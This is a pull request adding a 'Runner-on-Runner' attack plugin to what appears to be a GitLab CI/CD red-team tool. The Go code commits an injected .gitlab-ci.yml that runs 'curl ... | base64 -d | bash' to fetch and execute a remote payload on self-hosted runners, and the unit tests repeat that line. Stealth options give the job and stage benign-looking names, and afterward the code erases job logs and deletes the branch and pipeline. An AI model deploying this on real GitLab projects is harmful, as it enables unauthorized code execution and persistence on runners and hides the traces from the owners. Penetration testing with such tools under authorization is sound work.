### PR TITLE
Add Runner-on-Runner (RoR) attack plugin for GitLab

### DIFF
--- a/cmd/trajan/gitlab/attack.go
+++ b/cmd/trajan/gitlab/attack.go
@@ -14,6 +14,7 @@ import (
 	"github.com/praetorian-inc/trajan/pkg/attacks"
 	"github.com/praetorian-inc/trajan/pkg/platforms"
 
+	_ "github.com/praetorian-inc/trajan/pkg/gitlab/attacks/ror"
 	_ "github.com/praetorian-inc/trajan/pkg/gitlab/attacks/runnerexec"
 	_ "github.com/praetorian-inc/trajan/pkg/gitlab/attacks/secretsdump"
 )
@@ -38,7 +39,8 @@ Always use --dry-run first to preview changes.
 
 Available Plugins:
   secrets-dump        Exfiltrate CI/CD secrets via PPE (Poisoned Pipeline Execution)
-  runner-exec         Execute commands on self-hosted runners`,
+  runner-exec         Execute commands on self-hosted runners
+  ror                 Deploy a rogue runner via snippet payload (Runner-on-Runner)`,
 	RunE: runAttack,
 }
 
@@ -61,9 +63,18 @@ func init() {
 	attackCmd.Flags().StringVar(&attackOutputFile, "output-file", "", "save command output to file")
 
 	// runner-exec plugin flags
-	attackCmd.Flags().String("runner-tags", "", "comma-separated runner tags for runner-exec")
+	attackCmd.Flags().String("runner-tags", "", "comma-separated runner tags for targeting specific runners")
 	attackCmd.Flags().String("command", "", "command to execute for runner-exec")
 	attackCmd.Flags().Bool("no-cleanup", false, "preserve artifacts after attack (branch, pipeline, logs)")
+
+	// ror plugin flags
+	attackCmd.Flags().String("snippet-url", "", "URL to GitLab snippet containing base64-encoded RoR payload")
+	attackCmd.Flags().Bool("stealth", false, "use benign-looking job/stage/branch names")
+	attackCmd.Flags().String("job-name", "", "custom job name for the injected CI job")
+	attackCmd.Flags().String("stage-name", "", "custom stage name for the injected CI job")
+	attackCmd.Flags().String("commit-message", "Update CI configuration", "commit message for the injected .gitlab-ci.yml")
+	attackCmd.Flags().String("branch", "", "branch name for the attack (default: auto-generated)")
+	attackCmd.Flags().Int("persist", 0, "keep the job alive for N minutes after payload execution")
 }
 
 func runAttack(cmd *cobra.Command, args []string) error {
@@ -151,6 +162,26 @@ func runAttack(cmd *cobra.Command, args []string) error {
 		extraOpts["cleanup"] = "false"
 	}
 
+	// RoR plugin flags
+	if snippetURL, _ := cmd.Flags().GetString("snippet-url"); snippetURL != "" {
+		extraOpts["snippet-url"] = snippetURL
+	}
+	if stealthFlag, _ := cmd.Flags().GetBool("stealth"); stealthFlag {
+		extraOpts["stealth"] = "true"
+	}
+	if jn, _ := cmd.Flags().GetString("job-name"); jn != "" {
+		extraOpts["job-name"] = jn
+	}
+	if sn, _ := cmd.Flags().GetString("stage-name"); sn != "" {
+		extraOpts["stage-name"] = sn
+	}
+	if cm, _ := cmd.Flags().GetString("commit-message"); cm != "" {
+		extraOpts["commit-message"] = cm
+	}
+	if persist, _ := cmd.Flags().GetInt("persist"); persist > 0 {
+		extraOpts["persist"] = fmt.Sprintf("%d", persist)
+	}
+
 	// Execute plugins and collect results
 	var results []*attacks.AttackResult
 	for _, pluginName := range attackPlugins {
@@ -159,12 +190,14 @@ func runAttack(cmd *cobra.Command, args []string) error {
 			return fmt.Errorf("unknown plugin: %s", pluginName)
 		}
 
+		attackBranch, _ := cmd.Flags().GetString("branch")
 		opts := attacks.AttackOptions{
 			Platform:  platform,
 			Target:    target,
 			SessionID: sessionID,
 			DryRun:    attackDryRun,
 			Timeout:   attackTimeout,
+			Branch:    attackBranch,
 			ExtraOpts: extraOpts,
 		}
 

--- a/pkg/gitlab/attacks/ror/pipeline.go
+++ b/pkg/gitlab/attacks/ror/pipeline.go
@@ -1,0 +1,72 @@
+package ror
+
+import (
+	"fmt"
+	"math/rand"
+	"strings"
+)
+
+var benignJobNames = []string{
+	"lint", "code-quality", "dependency-check",
+	"static-analysis", "validate-config",
+}
+
+var benignStageNames = []string{
+	"test", "validate", "check", "lint",
+}
+
+// GeneratePipelineYAML generates .gitlab-ci.yml for the Runner-on-Runner attack.
+//
+// The payload is delivered via a GitLab snippet URL containing a base64-encoded script.
+// The generated YAML curls the snippet, decodes it, and executes it.
+//
+// Naming priority:
+//  1. Explicit jobName/stageName (highest)
+//  2. stealth=true -> random from benign lists
+//  3. Defaults: build_job / build
+func GeneratePipelineYAML(snippetURL string, runnerTags []string, stealth bool,
+	jobName, stageName string, persistMinutes int) string {
+
+	// Determine job name
+	jName := "build_job"
+	if jobName != "" {
+		jName = jobName
+	} else if stealth {
+		jName = benignJobNames[rand.Intn(len(benignJobNames))]
+	}
+
+	// Determine stage name
+	sName := "build"
+	if stageName != "" {
+		sName = stageName
+	} else if stealth {
+		sName = benignStageNames[rand.Intn(len(benignStageNames))]
+	}
+
+	// Build script lines
+	scriptLine := fmt.Sprintf("    - curl -s %s | base64 -d | bash", snippetURL)
+	var persistLine string
+	if persistMinutes > 0 {
+		persistLine = fmt.Sprintf("\n    - sleep %d", persistMinutes*60)
+	}
+
+	// Build tags section
+	var tagsYAML string
+	if len(runnerTags) > 0 {
+		var b strings.Builder
+		b.WriteString("  tags:\n")
+		for _, tag := range runnerTags {
+			b.WriteString(fmt.Sprintf("    - %s\n", tag))
+		}
+		tagsYAML = b.String()
+	}
+
+	return fmt.Sprintf(`stages:
+  - %s
+
+%s:
+  stage: %s
+%s  script:
+%s%s
+`, sName, jName, sName, tagsYAML, scriptLine, persistLine)
+}

--- a/pkg/gitlab/attacks/ror/pipeline_test.go
+++ b/pkg/gitlab/attacks/ror/pipeline_test.go
@@ -1,0 +1,84 @@
+package ror
+
+import (
+	"strings"
+	"testing"
+)
+
+func TestGeneratePipelineYAML_Basic(t *testing.T) {
+	yaml := GeneratePipelineYAML("https://gitlab.com/snippets/123/raw", []string{"self-hosted"}, false, "", "", 0)
+
+	if !strings.Contains(yaml, "build_job:") {
+		t.Error("expected default job name 'build_job'")
+	}
+	if !strings.Contains(yaml, "stage: build") {
+		t.Error("expected default stage 'build'")
+	}
+	if !strings.Contains(yaml, "curl -s https://gitlab.com/snippets/123/raw | base64 -d | bash") {
+		t.Error("expected snippet curl command")
+	}
+	if !strings.Contains(yaml, "- self-hosted") {
+		t.Error("expected runner tag")
+	}
+}
+
+func TestGeneratePipelineYAML_CustomNames(t *testing.T) {
+	yaml := GeneratePipelineYAML("https://example.com/snippet", []string{"docker"}, false, "my-job", "deploy", 0)
+
+	if !strings.Contains(yaml, "my-job:") {
+		t.Error("expected custom job name")
+	}
+	if !strings.Contains(yaml, "stage: deploy") {
+		t.Error("expected custom stage name")
+	}
+}
+
+func TestGeneratePipelineYAML_Stealth(t *testing.T) {
+	yaml := GeneratePipelineYAML("https://example.com/snippet", nil, true, "", "", 0)
+
+	// Should not contain defaults when stealth is on
+	if strings.Contains(yaml, "build_job:") {
+		t.Error("stealth mode should use benign job name, not default")
+	}
+}
+
+func TestGeneratePipelineYAML_Persist(t *testing.T) {
+	yaml := GeneratePipelineYAML("https://example.com/snippet", []string{"nuc"}, false, "", "", 5)
+
+	if !strings.Contains(yaml, "sleep 300") {
+		t.Error("expected sleep command for 5 minutes")
+	}
+}
+
+func TestGeneratePipelineYAML_NoTags(t *testing.T) {
+	yaml := GeneratePipelineYAML("https://example.com/snippet", nil, false, "", "", 0)
+
+	if strings.Contains(yaml, "tags:") {
+		t.Error("expected no tags section when no tags provided")
+	}
+}
+
+func TestGeneratePipelineYAML_MultipleTags(t *testing.T) {
+	yaml := GeneratePipelineYAML("https://example.com/snippet", []string{"privileged", "nuc", "docker"}, false, "", "", 0)
+
+	if !strings.Contains(yaml, "- privileged") {
+		t.Error("expected privileged tag")
+	}
+	if !strings.Contains(yaml, "- nuc") {
+		t.Error("expected nuc tag")
+	}
+	if !strings.Contains(yaml, "- docker") {
+		t.Error("expected docker tag")
+	}
+}
+
+func TestGeneratePipelineYAML_ExplicitNameOverridesStealth(t *testing.T) {
+	yaml := GeneratePipelineYAML("https://example.com/snippet", nil, true, "custom-job", "custom-stage", 0)
+
+	if !strings.Contains(yaml, "custom-job:") {
+		t.Error("explicit job name should override stealth")
+	}
+	if !strings.Contains(yaml, "stage: custom-stage") {
+		t.Error("explicit stage name should override stealth")
+	}
+}

--- a/pkg/gitlab/attacks/ror/ror.go
+++ b/pkg/gitlab/attacks/ror/ror.go
@@ -1,0 +1,416 @@
+// pkg/gitlab/attacks/ror/ror.go
+package ror
+
+import (
+	"context"
+	"fmt"
+	"os"
+	"path/filepath"
+	"strconv"
+	"strings"
+	"time"
+
+	"github.com/praetorian-inc/trajan/internal/registry"
+	"github.com/praetorian-inc/trajan/pkg/attacks"
+	"github.com/praetorian-inc/trajan/pkg/attacks/base"
+	"github.com/praetorian-inc/trajan/pkg/detections"
+	"github.com/praetorian-inc/trajan/pkg/gitlab"
+	"github.com/praetorian-inc/trajan/pkg/gitlab/attacks/common"
+)
+
+func init() {
+	registry.RegisterAttackPlugin("gitlab", "ror", func() attacks.AttackPlugin {
+		return New()
+	})
+}
+
+// Plugin implements Runner-on-Runner attack for GitLab
+type Plugin struct {
+	base.BaseAttackPlugin
+}
+
+// New creates a new ror attack plugin
+func New() *Plugin {
+	return &Plugin{
+		BaseAttackPlugin: base.NewBaseAttackPlugin(
+			"ror",
+			"Deploy a rogue runner via snippet payload on self-hosted GitLab runners (Runner-on-Runner)",
+			"gitlab",
+			attacks.CategoryPersistence,
+		),
+	}
+}
+
+// CanAttack always returns false (force-only plugin)
+func (p *Plugin) CanAttack(findings []detections.Finding) bool {
+	return false
+}
+
+// Execute performs the Runner-on-Runner attack
+func (p *Plugin) Execute(ctx context.Context, opts attacks.AttackOptions) (*attacks.AttackResult, error) {
+	result := &attacks.AttackResult{
+		Plugin:    p.Name(),
+		SessionID: opts.SessionID,
+		Timestamp: time.Now(),
+		Repo:      opts.Target.Value,
+	}
+
+	// Validate required flags
+	snippetURL := opts.ExtraOpts["snippet-url"]
+	if snippetURL == "" {
+		result.Success = false
+		result.Message = "--snippet-url flag is required"
+		return result, fmt.Errorf("missing required flag: --snippet-url")
+	}
+
+	// Parse runner tags (optional for RoR - may want default runner)
+	var runnerTags []string
+	if tagsStr := opts.ExtraOpts["runner-tags"]; tagsStr != "" {
+		runnerTags = strings.Split(tagsStr, ",")
+		for i := range runnerTags {
+			runnerTags[i] = strings.TrimSpace(runnerTags[i])
+		}
+	}
+
+	// Stealth options
+	stealth := opts.ExtraOpts["stealth"] == "true"
+	jobName := opts.ExtraOpts["job-name"]
+	stageName := opts.ExtraOpts["stage-name"]
+	commitMessage := opts.ExtraOpts["commit-message"]
+	if commitMessage == "" {
+		commitMessage = "Update CI configuration"
+	}
+
+	// Persist option
+	var persistMinutes int
+	if persistStr := opts.ExtraOpts["persist"]; persistStr != "" {
+		var err error
+		persistMinutes, err = strconv.Atoi(persistStr)
+		if err != nil {
+			result.Success = false
+			result.Message = fmt.Sprintf("invalid --persist value: %s", persistStr)
+			return result, fmt.Errorf("invalid persist value: %w", err)
+		}
+	}
+
+	// Get GitLab client
+	glPlatform, ok := opts.Platform.(*gitlab.Platform)
+	if !ok {
+		result.Success = false
+		result.Message = "platform is not GitLab"
+		return result, fmt.Errorf("invalid platform type")
+	}
+
+	client := glPlatform.Client()
+
+	// Setup log directory
+	logDir := initLogDir(opts.Target.Value, opts.SessionID)
+	fmt.Printf("[*] RoR logs will be written to: %s/\n", logDir)
+
+	// Get project
+	projectPath := opts.Target.Value
+	project, err := client.GetProject(ctx, projectPath)
+	if err != nil {
+		result.Success = false
+		result.Message = fmt.Sprintf("failed to get project: %v", err)
+		return result, err
+	}
+
+	projectID := project.ID
+
+	if project.Archived {
+		result.Success = false
+		result.Message = fmt.Sprintf("project %s is archived", projectPath)
+		return result, fmt.Errorf("project is archived")
+	}
+
+	fmt.Printf("[+] Project resolved: %s (id=%d)\n", projectPath, projectID)
+
+	// Check user permissions
+	user, err := client.GetUser(ctx)
+	if err != nil {
+		result.Success = false
+		result.Message = fmt.Sprintf("failed to get current user: %v", err)
+		return result, err
+	}
+
+	member, err := client.GetProjectMember(ctx, projectID, strconv.Itoa(user.ID))
+	if err != nil {
+		result.Success = false
+		result.Message = fmt.Sprintf("failed to check permissions: %v", err)
+		return result, err
+	}
+
+	if member.AccessLevel < 30 {
+		result.Success = false
+		result.Message = fmt.Sprintf("insufficient permissions: need Developer (30+), have %s (%d)",
+			member.RoleName, member.AccessLevel)
+		return result, fmt.Errorf("insufficient permissions")
+	}
+
+	fmt.Printf("[+] User has %s access (level: %d)\n", member.RoleName, member.AccessLevel)
+
+	if !project.JobsEnabled {
+		result.Success = false
+		result.Message = "CI/CD pipelines are disabled for this project"
+		return result, fmt.Errorf("pipelines disabled")
+	}
+
+	// Dry run check
+	if opts.DryRun {
+		yaml := GeneratePipelineYAML(snippetURL, runnerTags, stealth, jobName, stageName, persistMinutes)
+		writeLog(logDir, "generated_ci.yml", yaml)
+		fmt.Printf("\n[DRY RUN] Would commit the following .gitlab-ci.yml:\n%s\n", yaml)
+		result.Success = true
+		result.Message = "Dry run completed - no changes made"
+		return result, nil
+	}
+
+	// Cleanup tracking
+	var branchName string
+	var pipelineID int
+	var cleanupJobIDs []int
+
+	cleanup := &common.DeferredCleanup{
+		Client:     client,
+		ProjectID:  projectID,
+		BranchName: &branchName,
+		PipelineID: &pipelineID,
+		Disabled:   opts.ExtraOpts["cleanup"] == "false",
+	}
+	defer cleanup.Run()
+
+	// Determine branch name
+	if opts.Branch != "" {
+		branchName = opts.Branch
+	} else if stealth {
+		branchName = common.GenerateBranchName(opts.SessionID)
+	} else {
+		branchName = common.GenerateBranchName(opts.SessionID)
+	}
+
+	defaultBranch := project.DefaultBranch
+	if defaultBranch == "" {
+		defaultBranch = "main"
+	}
+
+	// Get default branch SHA
+	branchInfo, err := client.GetBranch(ctx, projectID, defaultBranch)
+	if err != nil {
+		result.Success = false
+		result.Message = fmt.Sprintf("failed to get default branch: %v", err)
+		return result, err
+	}
+
+	// Step 1: Create branch
+	fmt.Printf("\n[*] Step 1: Creating branch %s...\n", branchName)
+	err = client.CreateBranch(ctx, projectID, branchName, branchInfo.Commit.ID)
+	if err != nil {
+		if strings.Contains(err.Error(), "already exists") {
+			result.Success = false
+			result.Message = fmt.Sprintf("branch %s already exists", branchName)
+			return result, fmt.Errorf("branch already exists")
+		}
+		result.Success = false
+		result.Message = fmt.Sprintf("failed to create branch: %v", err)
+		return result, err
+	}
+
+	fmt.Printf("[+] Branch created: %s\n", branchName)
+
+	result.Artifacts = append(result.Artifacts, attacks.Artifact{
+		Type:        attacks.ArtifactBranch,
+		Identifier:  branchName,
+		Description: "RoR attack branch",
+	})
+
+	// Generate YAML
+	yamlContent := GeneratePipelineYAML(snippetURL, runnerTags, stealth, jobName, stageName, persistMinutes)
+	writeLog(logDir, "generated_ci.yml", yamlContent)
+	fmt.Printf("[+] Generated YAML written to: %s\n", filepath.Join(logDir, "generated_ci.yml"))
+
+	// Check if .gitlab-ci.yml exists on branch
+	_, err = client.GetWorkflowFile(ctx, projectID, ".gitlab-ci.yml", branchName)
+	action := "create"
+	if err == nil {
+		action = "update"
+	}
+
+	// Step 2: Commit
+	fmt.Printf("\n[*] Step 2: Committing .gitlab-ci.yml (%s)...\n", action)
+
+	commitActions := []gitlab.CommitAction{
+		{
+			Action:   action,
+			FilePath: ".gitlab-ci.yml",
+			Content:  yamlContent,
+		},
+	}
+
+	commit, err := client.CreateCommit(ctx, projectID, branchName, commitActions, commitMessage)
+	if err != nil {
+		result.Success = false
+		result.Message = fmt.Sprintf("failed to commit: %v", err)
+		return result, err
+	}
+
+	commitTimestamp := commit.CreatedAt
+	fmt.Printf("[+] Commit pushed successfully\n")
+
+	// Step 3: Monitor pipeline
+	timeout := 5 * time.Minute
+	if opts.Timeout > 0 {
+		timeout = opts.Timeout
+	}
+	if persistMinutes > 0 {
+		timeout = time.Duration(persistMinutes)*time.Minute + 3*time.Minute
+	}
+
+	fmt.Printf("\n[*] Step 3: Monitoring pipeline (timeout=%v)...\n", timeout)
+
+	pipeline, err := common.WaitForPipeline(ctx, client, projectID, branchName, commitTimestamp, timeout)
+	if err != nil {
+		result.Success = false
+		result.Message = fmt.Sprintf("pipeline wait failed: %v", err)
+
+		// Try to grab diagnostic info
+		pipelines, listErr := client.ListPipelines(ctx, projectID, branchName)
+		if listErr == nil && len(pipelines) > 0 {
+			pipelineID = pipelines[0].ID
+			diagInfo := fmt.Sprintf("Pipeline id=%d status=%s\n", pipelines[0].ID, pipelines[0].Status)
+
+			// Get job details
+			jobs, jobErr := client.ListPipelineJobs(ctx, projectID, pipelines[0].ID)
+			if jobErr == nil {
+				for _, job := range jobs {
+					diagInfo += fmt.Sprintf("Job id=%d name=%s status=%s\n", job.ID, job.Name, job.Status)
+					trace, traceErr := client.GetJobTrace(ctx, projectID, job.ID)
+					if traceErr == nil {
+						tracePath := writeLog(logDir, fmt.Sprintf("job_%d_%s_trace.log", job.ID, job.Name), trace)
+						fmt.Printf("[!] Job id=%d name=%s status=%s - trace written to: %s\n",
+							job.ID, job.Name, job.Status, tracePath)
+					}
+				}
+			}
+			writeLog(logDir, "pipeline_incomplete.txt", diagInfo)
+		}
+
+		return result, err
+	}
+
+	pipelineID = pipeline.ID
+
+	// Step 4: Retrieve job logs
+	fmt.Printf("\n[*] Step 4: Retrieving job logs for pipeline id=%d...\n", pipelineID)
+
+	jobs, err := client.ListPipelineJobs(ctx, projectID, pipelineID)
+	if err != nil {
+		result.Success = false
+		result.Message = fmt.Sprintf("failed to get pipeline jobs: %v", err)
+		return result, err
+	}
+
+	for _, job := range jobs {
+		cleanupJobIDs = append(cleanupJobIDs, job.ID)
+
+		trace, traceErr := client.GetJobTrace(ctx, projectID, job.ID)
+		if traceErr != nil {
+			fmt.Printf("[!] Could not retrieve trace for job %d: %v\n", job.ID, traceErr)
+			continue
+		}
+
+		tracePath := writeLog(logDir, fmt.Sprintf("job_%d_%s_trace.log", job.ID, job.Name), trace)
+
+		runnerDesc := "unknown"
+		if desc, ok := job.Runner["description"].(string); ok && desc != "" {
+			runnerDesc = desc
+		}
+
+		fmt.Printf("\n--- Job: %s (id=%d, status=%s, runner=%s) ---\n",
+			job.Name, job.ID, job.Status, runnerDesc)
+		fmt.Printf("    Trace written to: %s\n", tracePath)
+
+		// Print last 30 lines preview
+		lines := strings.Split(trace, "\n")
+		if len(lines) > 30 {
+			fmt.Printf("    (showing last 30 lines, full trace in log file)\n")
+			for _, line := range lines[len(lines)-30:] {
+				fmt.Printf("    %s\n", line)
+			}
+		} else {
+			for _, line := range lines {
+				fmt.Printf("    %s\n", line)
+			}
+		}
+	}
+
+	// Erase job logs before cleanup deletes pipeline
+	for _, jobID := range cleanupJobIDs {
+		if err := client.DeleteJobLogs(ctx, projectID, jobID); err != nil {
+			fmt.Printf("[!] Failed to erase job %d logs: %v\n", jobID, err)
+		} else {
+			fmt.Printf("[+] Erased job %d logs\n", jobID)
+		}
+	}
+
+	// Write summary
+	summary := fmt.Sprintf("Pipeline ID: %d\nStatus: %s\nBranch: %s\nProject: %s (id=%d)\nSession: %s\n",
+		pipelineID, pipeline.Status, branchName, projectPath, projectID, opts.SessionID)
+	writeLog(logDir, "summary.txt", summary)
+
+	// Success
+	result.Success = true
+	result.Message = fmt.Sprintf("RoR payload delivered via pipeline %d on runner", pipelineID)
+	result.Data = map[string]interface{}{
+		"pipeline_id":  pipelineID,
+		"branch":       branchName,
+		"snippet_url":  snippetURL,
+		"runner_tags":  runnerTags,
+		"log_dir":      logDir,
+		"jobs":         cleanupJobIDs,
+	}
+
+	result.CleanupActions = []attacks.CleanupAction{
+		{
+			Type:        attacks.ArtifactBranch,
+			Identifier:  branchName,
+			Action:      "delete",
+			Description: "Delete RoR attack branch",
+		},
+		{
+			Type:        attacks.ArtifactWorkflow,
+			Identifier:  fmt.Sprintf("pipeline:%d", pipelineID),
+			Action:      "delete",
+			Description: "Delete pipeline",
+		},
+	}
+
+	fmt.Printf("\n[+] RoR attack complete. Logs saved to: %s/\n", logDir)
+
+	return result, nil
+}
+
+// Cleanup removes artifacts created by the attack
+func (p *Plugin) Cleanup(ctx context.Context, session *attacks.Session) error {
+	glPlatform, ok := session.Platform.(*gitlab.Platform)
+	if !ok {
+		return fmt.Errorf("invalid platform type")
+	}
+	return common.CleanupSessionArtifacts(ctx, glPlatform.Client(), session, p.Name())
+}
+
+// initLogDir creates a timestamped log directory for this attack run
+func initLogDir(projectPath, sessionID string) string {
+	safe := strings.ReplaceAll(projectPath, "/", "_")
+	timestamp := time.Now().Format("20060102_150405")
+	logDir := filepath.Join("ror_logs", fmt.Sprintf("%s_%s_%s", safe, timestamp, sessionID))
+	os.MkdirAll(logDir, 0700)
+	return logDir
+}
+
+// writeLog writes content to a file in the log directory and returns the path
+func writeLog(logDir, filename, content string) string {
+	path := filepath.Join(logDir, filename)
+	os.WriteFile(path, []byte(content), 0600)
+	return path
+}


### PR DESCRIPTION
## Summary
- New `ror` attack plugin that deploys rogue runners via snippet payloads on self-hosted GitLab runners
- Supports stealth mode (benign job/stage names), custom naming, runner tag targeting, persist option, and automatic cleanup of branches/pipelines/job logs
- Includes YAML generation with unit tests (7 tests, all passing)
- Wired into existing CLI with flags: `--snippet-url`, `--stealth`, `--job-name`, `--stage-name`, `--commit-message`, `--branch`, `--persist`

## Test plan
- [x] `go build ./...` — full project builds clean
- [x] `go test ./pkg/gitlab/attacks/ror/` — all 7 tests pass
- [ ] Manual end-to-end test against a GitLab instance with self-hosted runners